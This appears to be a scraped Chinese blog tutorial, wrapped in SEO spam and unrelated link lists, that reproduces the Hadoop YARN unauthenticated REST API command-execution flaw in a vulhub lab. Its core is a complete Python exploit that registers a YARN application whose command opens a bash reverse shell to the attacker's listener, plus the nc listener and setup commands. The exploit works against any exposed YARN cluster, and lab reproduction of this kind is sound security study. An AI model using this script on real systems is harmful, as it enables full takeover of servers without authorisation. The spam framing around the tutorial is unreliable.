当前位置: 首页 > news >正文

深圳西乡租房中国网络优化公司排名

深圳西乡租房,中国网络优化公司排名,开发软件开发外包,天猫运营培训数据库安全:Hadoop 未授权访问-命令执行漏洞. Hadoop 未授权访问主要是因为 Hadoop YARN 资源管理系统配置不当,导致可以未经授权进行访问,从而被攻击者恶意利用。攻击者无需认证即可通过 RESTAPI 部署任务来执行任意指令,最终完…

数据库安全:Hadoop 未授权访问-命令执行漏洞.

Hadoop 未授权访问主要是因为 Hadoop YARN 资源管理系统配置不当,导致可以未经授权进行访问,从而被攻击者恶意利用。攻击者无需认证即可通过 RESTAPI 部署任务来执行任意指令,最终完全控制服务器。


目录:

数据库安全:Hadoop 未授权访问-命令执行漏洞.

Hadoop 未授权访问-命令执行漏洞:

开启 vulhub 靶场环境:

Hadoop 未授权访问-命令执行漏洞测试:


Hadoop 未授权访问-命令执行漏洞:

开启 vulhub 靶场环境:

 第一步:切换到 vulhub 目录下

cd vulhub


第二步:切换到 hadoop 目录下

cd hadoop


第三步:切换到 unauthorized-yarn 漏洞目录下.


第四步:开启 漏洞 服务.

docker-compose up -d


第五步:访问  http:// (靶场 IP 地址):8088


   

Hadoop 未授权访问-命令执行漏洞测试:

第一步:访问 /cluster/apps 页面【如果 该页面存在的话,说明存在未授权访问漏洞】

http://192.168.0.106:8088/cluster/apps


第二步:在 攻击机(kali)设置监听.

nc -nvlp 8888// 设置 监听 端口为8888


第三步:编写 Python 执行代码.

import requestsdef shell(url,vps_ip,port):headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'}response = requests.post(url+"/ws/v1/cluster/apps/new-application",headers=headers)id = response.json()["application-id"]data = {'application-id': id,'application-name': 'getshell','am-container-spec': {'commands': {'command': '/bin/bash -i >& /dev/tcp/%s/%s 0>&1'%(vps_ip,port)},},'application-type': 'YARN'}exploit = requests.post(url+"/ws/v1/cluster/apps",headers=headers,json=data)print("[+] 执行完成!")if __name__ == '__main__':url = input("目标的URL:")vps_ip = input("监听的主机IP地址(kali):")port = input("监听的主机端口(kali):")shell(url,vps_ip,port)

执行代码:


第四步:返回 监听的主机查看结果,发现已经成功.


    

     

     

参考文章:Hadoop 漏洞复现_hadoop命令执行漏洞-CSDN博客

学习链接:第55天:服务攻防-数据库安全_Redis_Hadoop_Mysql_未授权访问_RCE_哔哩哔哩_bilibili

http://www.bjxfkj.com.cn/article/108585.html

相关文章:

  • 网站运营系统tk域名官方网站
  • 网站建设标志设计什么是网络设计师
  • 网站关键词百度自然排名优化网站网页设计费用
  • 互助资金盘网站开发继续访问这个网站
  • 高端网站建设专业公司去掉wordpress 上一篇
  • app手机网站开发什么网站可以做外单
  • 学网站开发有前途吗珠海中英文网站建设
  • 网站建设教程ppt常州网站建设 个人
  • 简易网站制作网站建设的课件
  • 哈尔滨工程建设信息网站网站建设该如何学
  • 网站建设头像免费源码下载网站
  • 电子商务网站建设感悟专业做网站技术
  • 上海网站搭建公司哪家好安阳网站如何做优化
  • 成都网站开发环球中心wordpress主题带卡密
  • 北京企业建站模板树莓派做网站服务器怎样
  • 定制搭建网站淮安软件园哪家做网站
  • 做章的网站五八同城网站开发了多久
  • 学做效果图的网站濮阳县网
  • 做外贸一般上什么网站中国电信的视频播放器
  • 部队网站建设报告微官网和移动网站区别吗
  • 南京电信网站备案南沙网站建设方案
  • 网站运营和管理美丽阿坝网站怎么做
  • 外国电商设计网站有哪些问题一个小外贸公司怎么开
  • 网站菜单代码企业局域网的搭建与配置
  • mvc 做网站家居设计案例
  • 网站推广seo系统wordpress间文章同步
  • 网站迁移长沙品牌设计公司
  • 扁平网站欣赏哪些软件属于网页制作工具
  • 网站环境配置wordpress移植
  • 辽宁省水利建设市场信用信息平台网站江苏自助建站系统哪家好